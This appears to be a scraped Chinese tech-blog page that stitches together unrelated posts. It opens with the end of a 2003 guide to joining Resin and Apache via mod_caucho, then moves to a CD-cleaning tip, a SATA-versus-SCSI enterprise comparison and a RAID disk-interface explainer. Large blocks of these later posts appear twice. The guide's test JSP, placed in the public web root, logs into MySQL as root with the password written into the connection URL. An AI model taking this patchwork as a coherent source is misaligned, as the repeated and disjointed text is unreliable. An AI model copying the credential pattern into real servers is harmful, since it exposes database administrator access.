修改/usr/local/terry_yu/apache/conf/httpd.conf,在编译resin时,安装程序已经修改过httpd.conf,不过还不完全正确,应该改成类似以下的配置,如果你完全按本文进行的安装可以直接复制这些内容:
LoadModule caucho_module libexec/mod_caucho.so
AddModule mod_caucho.c
<IfModule mod_caucho.c>
ResinConfigServer localhost 6802
<Location /caucho-status>
SetHandler caucho-status
</Location>
</IfModule>
修改完后,重新启动resin后生效:
/usr/local/terry_yu/resin/bin/httpd.sh restart
/usr/local/terry_yu/apache/bin/apachectl restart
通过浏览器去访问http://localhost/caucho-status/,如果出现以下页面刚表示resin和apache已经成功整合了。
然后再测试一下JSP对数据库的访问,在/usr/local/apache/htdocs/下面用jsp写一个简单的jsp文件来连接本机的MySQL数据库:
vi /usr/local/terry_yu/apache/htdocs/testdb.jsp
输入以下内容,可以直接粘贴:
<html>
<head>
<title>Test JDBC For MySQL</title>
</head>
<body>
<%@ page contentType="text/html;charset=gb2312" %>
<%
Class.forName("com.mysql.jdbc.Driver").newInstance();
java.sql.Connection conn;
conn =
java.sql.DriverManager.getConnection("jdbc:mysql://localhost/mysql?user=root&password=abcdefg");
%>
</body>
</html>
通过浏览器去访问http://localhost/testdb,如果看到了一个没有任何错误信息的空白页面,就表示jsp连接本机的MySQL数据库成功了,至此我们就完成了一个支持JSP+PHP+MySQL的Web服务器。
注:以上所有安装都是在Red Hat Linux9.0上完成的,所使用软件也均为目前(2003年9月)最新的版本。
本文介绍了如何在Linux上架设同时支持JSP和PHP的Web Server,演示了MySQL、JDK、JDBC、Apache、PHP、Resin的安装和简单测试过程。
光盘表面很容易沾上灰尘,导致播放CD时产生声音或者图像的跳跃,甚至无法完全播放。此时,你应该考虑清洁一下光盘了。你先准备一些较柔和的清洁剂或肥皂、清水、一块软布(在一些音乐制品商店可买到很便宜的垫布),清洁时应从盘的中心向外面擦拭,并且不要顺着存贮数据的轨道方向擦拭。
与许多人想象的相反,CD盘实际上也很容易受损伤。所以在擦拭盘的表面时一定要非常小心,尤其要避免将指纹留在上面,千万不要使用家中常用的强烈清洁剂。清洁后,一定要记住将CD盘晾干,当然不能在阳光下暴晒。
与许多人想象的相反,CD盘实际上也很容易受损伤。所以在擦拭盘的表面时一定要非常小心,尤其要避免将指纹留在上面,千万不要使用家中常用的强烈清洁剂。清洁后,一定要记住将CD盘晾干,当然不能在阳光下暴晒。
[ 2004/11/05 17:04 | by 网络毛毛虫 ]
SCSI与ATA是硬盘的两大接口类型。长期以来,两者可以说互不侵犯,和睦共处,但如今,情况似乎有了变化。
当串行化的潮流向PC架构涌入时,ATA突然有了脱胎换骨的改变,无论是物理特性还是逻辑功能,都较以往有了重大的突破。PATA至SATA的转变甚至也让高高在上的企业级人士刮目相看。尤其是万转SATA硬盘出现,使SATA vs.SCSI的话题再次成为了用户争论的焦点。
那么,现在的你又该如何选择呢?个人用户我想就不用说,巨大的价格差距比任何理由都有份量。因此在这里我们着重分析一下在企业级应用中,SCSI与SATA的利弊取舍。
一、可靠性:
这可能是企业级用户最为关注的话题。在这些方面很多人一直有个误区,即SCSI=高可靠性、ATA=低可靠性。其实,硬盘的可靠性是与接口无关的。接口在硬盘上就是一块PCB电路板,而决定产品可靠性的更多的是那些硬盘的其他可更换的组件、如磁头、马达、轴承、伺服系统、磁头臂以及磁盘。使用与SCSI硬盘相同的组件加上ATA接口电路完全可以达到相同的可靠性级别。WD Raptor硬盘就可以提供120万小时的平均无故障时间和5年质保。
二、性能:
SCSI硬盘目前的最高转速可达15000rpm,SATA硬盘则是10000rpm,更高的转速可以获得更高的寻址速度,这永远是高转速硬盘的优势。但15000rpm并不是市场的主流,就目前最高采用率的SCSI硬盘而言,仍以10000rpm为主,此时Raptor与之相比完全不处劣势。我们可以从以下两个方面进行讨论:
接口速度:SCSI目前最高的水平是320MB/s,SATA是150MB/s。但SCSI总线是共享的,SATA则是点对点的,这就意味着当SCSI通道内的硬盘实际带宽总和超过320MB/s时(目前SCSI硬盘数据传输率最高在75MB/s,4块SCSI硬盘就基本达到了实际带宽总和),SCSI总线反而将成为瓶颈。SATA则没有这个问题。举个例子来说,5块SCSI硬盘系统的数据传输率仍然是有限的320MB/s 然而5块SATA的系统则能够达到750MB/s。
命令队列: SCSI的标记命令队列(TCQ——Tagged Command Queuing)功能是相对于PATA的绝对优势,但这也只能怪PATA并没有发挥ATA完全的优势。自1998年ATA-4规范开始,就加入了TCQ功能(实际上是CQ)。在SATA硬盘时代,WD公司率先在Raptor上支持了这一技术。而新一代SATA硬盘也将会支持SATA-II标准中的本机命令队列(NCQ——Native Command Queuing)技术。Raptor虽然支持的是PATA中的相关功能,但在性能上已经展露头脚,著名的硬盘网站StorageReview.com在将其与希捷Cheetah 10K.6 SCSI硬盘对比测试(使用支持TCQ的PROMISE SATA150TX4 SATA控制器)后得出结论——“SATA命令队列和SATA RAID具有和SCSI命令队列及SCSI RAID同样卓越的潜力为服务器市场带来利益。”另外需要强调的是,虽然Raptor的TCQ只支持32级队列深度,但不要以为SCSI的256级TCQ能全部发挥作用,事实上很少有硬盘能真正用上256级命令队列。
三、容量与成本:
这方面显然是SATA占优了,看看目前SCSI与SATA硬盘各自的最大容量,你就深有体会了。SATA硬盘已经达到400GB,而计划上市的SCSI硬盘只达到300GB的水平。而且SATA硬盘的价格更加便宜。这就意味着在同一总容量下,用户可以使用数量更少的SATA硬盘,从而节约总成本。StorageReview.com在对比完西部数据Raptor与希捷Cheetah 10K.6 SCSI硬盘之后表示——“基于SATA系统的成本比SCSI降低了百分之四十之多,的确非常显著”。
除此之外,SATA硬盘还具备热插拔能力,并且可以在接口上具备很好的可伸缩性,如在机架式服务器中使用SCSI-SATA、FC-SATA转换接口,以及SATA端口位增器( Port Multiplier),使其具有比SCSI更好的灵活性。另外,一些专门用于服务器领域的专业技术也完全可以应用于SATA硬盘,如WD的Raptor就采用了可以感应高速旋转所产生的振动并校正磁头寻址的旋转加速前馈技术(RAFF——Rotational Accelerometer Feed Forward)以确保在高转速提供应有的性能,同时它还具有类似于SCSI的企业扩展SMART访问(EESA——Enterprise Extensions S.M.A.R.T. Accessed)功能,以便在出现错误前提前向RAID控制器预警。
需要指出的是,目前包括EMC、IBM、HP、StorageTek、Sun、Dell在内的国际著名存储设备提供商都推出了基于SATA硬盘的次级存储系统,体现了SATA硬盘在企业级应用中的强大潜力,新一代SATA-II标准无疑将进一步加强SATA在这一领域的实力。
当然,SCSI也有着目前SATA所不及的地方,比如在双机热备应用中,SCSI系统的菊花环式共享连接可以为硬盘提供两个路径,而现在的SATA则不行。当然,在SATA-II标准中,这将不成问题,它将允许在一个硬盘有两个接口。
综上所述,我们可以发现在中低端的企业级的应用环境中,SATA已经显现出强大的竞争力。在搭建相应的企业级产品时,的确可以考虑采用SATA硬盘了。
当串行化的潮流向PC架构涌入时,ATA突然有了脱胎换骨的改变,无论是物理特性还是逻辑功能,都较以往有了重大的突破。PATA至SATA的转变甚至也让高高在上的企业级人士刮目相看。尤其是万转SATA硬盘出现,使SATA vs.SCSI的话题再次成为了用户争论的焦点。
那么,现在的你又该如何选择呢?个人用户我想就不用说,巨大的价格差距比任何理由都有份量。因此在这里我们着重分析一下在企业级应用中,SCSI与SATA的利弊取舍。
一、可靠性:
这可能是企业级用户最为关注的话题。在这些方面很多人一直有个误区,即SCSI=高可靠性、ATA=低可靠性。其实,硬盘的可靠性是与接口无关的。接口在硬盘上就是一块PCB电路板,而决定产品可靠性的更多的是那些硬盘的其他可更换的组件、如磁头、马达、轴承、伺服系统、磁头臂以及磁盘。使用与SCSI硬盘相同的组件加上ATA接口电路完全可以达到相同的可靠性级别。WD Raptor硬盘就可以提供120万小时的平均无故障时间和5年质保。
二、性能:
SCSI硬盘目前的最高转速可达15000rpm,SATA硬盘则是10000rpm,更高的转速可以获得更高的寻址速度,这永远是高转速硬盘的优势。但15000rpm并不是市场的主流,就目前最高采用率的SCSI硬盘而言,仍以10000rpm为主,此时Raptor与之相比完全不处劣势。我们可以从以下两个方面进行讨论:
接口速度:SCSI目前最高的水平是320MB/s,SATA是150MB/s。但SCSI总线是共享的,SATA则是点对点的,这就意味着当SCSI通道内的硬盘实际带宽总和超过320MB/s时(目前SCSI硬盘数据传输率最高在75MB/s,4块SCSI硬盘就基本达到了实际带宽总和),SCSI总线反而将成为瓶颈。SATA则没有这个问题。举个例子来说,5块SCSI硬盘系统的数据传输率仍然是有限的320MB/s 然而5块SATA的系统则能够达到750MB/s。
命令队列: SCSI的标记命令队列(TCQ——Tagged Command Queuing)功能是相对于PATA的绝对优势,但这也只能怪PATA并没有发挥ATA完全的优势。自1998年ATA-4规范开始,就加入了TCQ功能(实际上是CQ)。在SATA硬盘时代,WD公司率先在Raptor上支持了这一技术。而新一代SATA硬盘也将会支持SATA-II标准中的本机命令队列(NCQ——Native Command Queuing)技术。Raptor虽然支持的是PATA中的相关功能,但在性能上已经展露头脚,著名的硬盘网站StorageReview.com在将其与希捷Cheetah 10K.6 SCSI硬盘对比测试(使用支持TCQ的PROMISE SATA150TX4 SATA控制器)后得出结论——“SATA命令队列和SATA RAID具有和SCSI命令队列及SCSI RAID同样卓越的潜力为服务器市场带来利益。”另外需要强调的是,虽然Raptor的TCQ只支持32级队列深度,但不要以为SCSI的256级TCQ能全部发挥作用,事实上很少有硬盘能真正用上256级命令队列。
三、容量与成本:
这方面显然是SATA占优了,看看目前SCSI与SATA硬盘各自的最大容量,你就深有体会了。SATA硬盘已经达到400GB,而计划上市的SCSI硬盘只达到300GB的水平。而且SATA硬盘的价格更加便宜。这就意味着在同一总容量下,用户可以使用数量更少的SATA硬盘,从而节约总成本。StorageReview.com在对比完西部数据Raptor与希捷Cheetah 10K.6 SCSI硬盘之后表示——“基于SATA系统的成本比SCSI降低了百分之四十之多,的确非常显著”。
除此之外,SATA硬盘还具备热插拔能力,并且可以在接口上具备很好的可伸缩性,如在机架式服务器中使用SCSI-SATA、FC-SATA转换接口,以及SATA端口位增器( Port Multiplier),使其具有比SCSI更好的灵活性。另外,一些专门用于服务器领域的专业技术也完全可以应用于SATA硬盘,如WD的Raptor就采用了可以感应高速旋转所产生的振动并校正磁头寻址的旋转加速前馈技术(RAFF——Rotational Accelerometer Feed Forward)以确保在高转速提供应有的性能,同时它还具有类似于SCSI的企业扩展SMART访问(EESA——Enterprise Extensions S.M.A.R.T. Accessed)功能,以便在出现错误前提前向RAID控制器预警。
需要指出的是,目前包括EMC、IBM、HP、StorageTek、Sun、Dell在内的国际著名存储设备提供商都推出了基于SATA硬盘的次级存储系统,体现了SATA硬盘在企业级应用中的强大潜力,新一代SATA-II标准无疑将进一步加强SATA在这一领域的实力。
当然,SCSI也有着目前SATA所不及的地方,比如在双机热备应用中,SCSI系统的菊花环式共享连接可以为硬盘提供两个路径,而现在的SATA则不行。当然,在SATA-II标准中,这将不成问题,它将允许在一个硬盘有两个接口。
综上所述,我们可以发现在中低端的企业级的应用环境中,SATA已经显现出强大的竞争力。在搭建相应的企业级产品时,的确可以考虑采用SATA硬盘了。
接口是指RAID卡支持的硬盘接口,目前主要有三种:IDE接口、SCSI接口和SATA接口。
IDE接口:
IDE的英文全称为“Integrated Drive Electronics”,即“电子集成驱动器”,它的本意是指把“硬盘控制器”与“盘体”集成在一起的硬盘驱动器。把盘体与控制器集成在一起的做法减少了硬盘接口的电缆数目与长度,数据传输的可靠性得到了增强,硬盘制造起来变得更容易,因为硬盘生产厂商不需要再担心自己的硬盘是否与其它厂商生产的控制器兼容,对用户而言,硬盘安装起来也更为方便。IDE这一接口技术从诞生至今就一直在不断发展,性能也不断的提高,其拥有的价格低廉、兼容性强的特点,为其造就了其它类型硬盘无法替代的地位。
IDE代表着硬盘的一种类型,但在实际的应用中,人们也习惯用IDE来称呼最早出现IDE类型硬盘ATA-1,这种类型的接口随着接口技术的发展已经被淘汰了,而其后发展分支出更多类型的硬盘接口,比如ATA、Ultra ATA、DMA、Ultra DMA等接口都属于IDE硬盘。此外,由于IDE口属于并行接口,因此为了和SATA口硬盘相区别,IDE口硬盘也叫PATA口硬盘。
SCSI接口:
SCSI的英文全称为“Small Computer System Interface”(小型计算机系统接口),是同IDE完全不同的接口,IDE接口是普通PC的标准接口,而SCSI并不是专门为硬盘设计的接口,是一种广泛应用于小型机上的高速数据传输技术。SCSI接口具有应用范围广、多任务、带宽大、CPU占用率低,以及支持热插拔等优点,但较高的价格使得它很难如IDE硬盘般普及,因此SCSI硬盘主要应用于中、高端服务器和高档工作站中。SCSI硬盘和普通IDE硬盘相比有很多优点:接口速度快,并且由于主要用于服务器,因此硬盘本身的性能也比较高,硬盘转速快,缓存容量大,CPU占用率低,扩展性远优于IDE硬盘,并且支持热插拔。
SATA接口:
使用SATA(Serial ATA)口的硬盘又叫串口硬盘,是未来PC机硬盘的趋势。2001年,由Intel、APT、Dell、IBM、希捷、迈拓这几大厂商组成的Serial ATA委员会正式确立了Serial ATA 1.0规范,2002年,虽然串行ATA的相关设备还未正式上市,但Serial ATA委员会已抢先确立了Serial ATA 2.0规范。Serial ATA采用串行连接方式,串行ATA总线使用嵌入式时钟信号,具备了更强的纠错能力,与以往相比其最大的区别在于能对传输指令(不仅仅是数据)进行检查,如果发现错误会自动矫正,这在很大程度上提高了数据传输的可靠性。串行接口还具有结构简单、支持热插拔的优点。
串口硬盘是一种完全不同于并行ATA的新型硬盘接口类型,由于采用串行方式传输数据而知名。相对于并行ATA来说,就具有非常多的优势。首先,Serial ATA以连续串行的方式传送数据,一次只会传送1位数据。这样能减少SATA接口的针脚数目,使连接电缆数目变少,效率也会更高。实际上,Serial ATA 仅用四支针脚就能完成所有的工作,分别用于连接电缆、连接地线、发送数据和接收数据,同时这样的架构还能降低系统能耗和减小系统复杂性。其次,Serial ATA的起点更高、发展潜力更大,Serial ATA 1.0定义的数据传输率可达150MB/s,这比目前最新的并行ATA(即ATA/133)所能达到133MB/s的最高数据传输率还高,而在Serial ATA 2.0的数据传输率将达到300MB/s,最终SATA将实现600MB/s的最高数据传输率。
支持Serial-ATA技术的标志
[img align=F]http://publish.it168.com/cWord/images/195031.jpg[/img]
主板上的Serial-ATA接口
[img align=F]http://publish.it168.com/cWord/images/195035.jpg[/img]
RAID技术问世时是基于SCSI接口,因其成本高,因此主要面向服务器等高端应用。普通用户根本无缘拥有RAID。随着计算机的大众化,由此带动PC计算机的空前繁荣。相应的,在市场的带动下,用于PC计算机的IDE接口设备价格大幅降低,同时性能大幅提高。鉴于此,RAID技术开始移植到IDE 接口上,推出了基于IDE接口的RAID应用,称为IDE RAID。而基于SCSI接口的RAID应用则相应称为SCSI RAID。与SCSI RAID相比,IDE RAID具有极低的价格,和一点也不逊色的性能表现,相应的,IDE RAID 解决方案就具有SCSI RAID无法比拟的高性价比。因此 IDE RAID自推出后,受到普通PC用户和普通商业应用的普遍欢迎。
当然IDE RAID也有其缺点,比如在CPU占用率和连接设备数量等方面就无法与SCSI RAID相比,同时,IDE RAID目前为止还只支持RAID0、RAID1和RAID0+1,并且性能上也比SCSI RAID略逊一筹,因此高性能计算机应用方面还是以SCSI RAID为主。SATA RAID是刚刚诞生的RAID方式,它与IDE RAID类似,最大的优点是低成本,其他方面也和IDE RAID接近。
IDE接口:
IDE的英文全称为“Integrated Drive Electronics”,即“电子集成驱动器”,它的本意是指把“硬盘控制器”与“盘体”集成在一起的硬盘驱动器。把盘体与控制器集成在一起的做法减少了硬盘接口的电缆数目与长度,数据传输的可靠性得到了增强,硬盘制造起来变得更容易,因为硬盘生产厂商不需要再担心自己的硬盘是否与其它厂商生产的控制器兼容,对用户而言,硬盘安装起来也更为方便。IDE这一接口技术从诞生至今就一直在不断发展,性能也不断的提高,其拥有的价格低廉、兼容性强的特点,为其造就了其它类型硬盘无法替代的地位。
IDE代表着硬盘的一种类型,但在实际的应用中,人们也习惯用IDE来称呼最早出现IDE类型硬盘ATA-1,这种类型的接口随着接口技术的发展已经被淘汰了,而其后发展分支出更多类型的硬盘接口,比如ATA、Ultra ATA、DMA、Ultra DMA等接口都属于IDE硬盘。此外,由于IDE口属于并行接口,因此为了和SATA口硬盘相区别,IDE口硬盘也叫PATA口硬盘。
SCSI接口:
SCSI的英文全称为“Small Computer System Interface”(小型计算机系统接口),是同IDE完全不同的接口,IDE接口是普通PC的标准接口,而SCSI并不是专门为硬盘设计的接口,是一种广泛应用于小型机上的高速数据传输技术。SCSI接口具有应用范围广、多任务、带宽大、CPU占用率低,以及支持热插拔等优点,但较高的价格使得它很难如IDE硬盘般普及,因此SCSI硬盘主要应用于中、高端服务器和高档工作站中。SCSI硬盘和普通IDE硬盘相比有很多优点:接口速度快,并且由于主要用于服务器,因此硬盘本身的性能也比较高,硬盘转速快,缓存容量大,CPU占用率低,扩展性远优于IDE硬盘,并且支持热插拔。
SATA接口:
使用SATA(Serial ATA)口的硬盘又叫串口硬盘,是未来PC机硬盘的趋势。2001年,由Intel、APT、Dell、IBM、希捷、迈拓这几大厂商组成的Serial ATA委员会正式确立了Serial ATA 1.0规范,2002年,虽然串行ATA的相关设备还未正式上市,但Serial ATA委员会已抢先确立了Serial ATA 2.0规范。Serial ATA采用串行连接方式,串行ATA总线使用嵌入式时钟信号,具备了更强的纠错能力,与以往相比其最大的区别在于能对传输指令(不仅仅是数据)进行检查,如果发现错误会自动矫正,这在很大程度上提高了数据传输的可靠性。串行接口还具有结构简单、支持热插拔的优点。
串口硬盘是一种完全不同于并行ATA的新型硬盘接口类型,由于采用串行方式传输数据而知名。相对于并行ATA来说,就具有非常多的优势。首先,Serial ATA以连续串行的方式传送数据,一次只会传送1位数据。这样能减少SATA接口的针脚数目,使连接电缆数目变少,效率也会更高。实际上,Serial ATA 仅用四支针脚就能完成所有的工作,分别用于连接电缆、连接地线、发送数据和接收数据,同时这样的架构还能降低系统能耗和减小系统复杂性。其次,Serial ATA的起点更高、发展潜力更大,Serial ATA 1.0定义的数据传输率可达150MB/s,这比目前最新的并行ATA(即ATA/133)所能达到133MB/s的最高数据传输率还高,而在Serial ATA 2.0的数据传输率将达到300MB/s,最终SATA将实现600MB/s的最高数据传输率。
支持Serial-ATA技术的标志
[img align=F]http://publish.it168.com/cWord/images/195031.jpg[/img]
主板上的Serial-ATA接口
[img align=F]http://publish.it168.com/cWord/images/195035.jpg[/img]
RAID技术问世时是基于SCSI接口,因其成本高,因此主要面向服务器等高端应用。普通用户根本无缘拥有RAID。随着计算机的大众化,由此带动PC计算机的空前繁荣。相应的,在市场的带动下,用于PC计算机的IDE接口设备价格大幅降低,同时性能大幅提高。鉴于此,RAID技术开始移植到IDE 接口上,推出了基于IDE接口的RAID应用,称为IDE RAID。而基于SCSI接口的RAID应用则相应称为SCSI RAID。与SCSI RAID相比,IDE RAID具有极低的价格,和一点也不逊色的性能表现,相应的,IDE RAID 解决方案就具有SCSI RAID无法比拟的高性价比。因此 IDE RAID自推出后,受到普通PC用户和普通商业应用的普遍欢迎。
当然IDE RAID也有其缺点,比如在CPU占用率和连接设备数量等方面就无法与SCSI RAID相比,同时,IDE RAID目前为止还只支持RAID0、RAID1和RAID0+1,并且性能上也比SCSI RAID略逊一筹,因此高性能计算机应用方面还是以SCSI RAID为主。SATA RAID是刚刚诞生的RAID方式,它与IDE RAID类似,最大的优点是低成本,其他方面也和IDE RAID接近。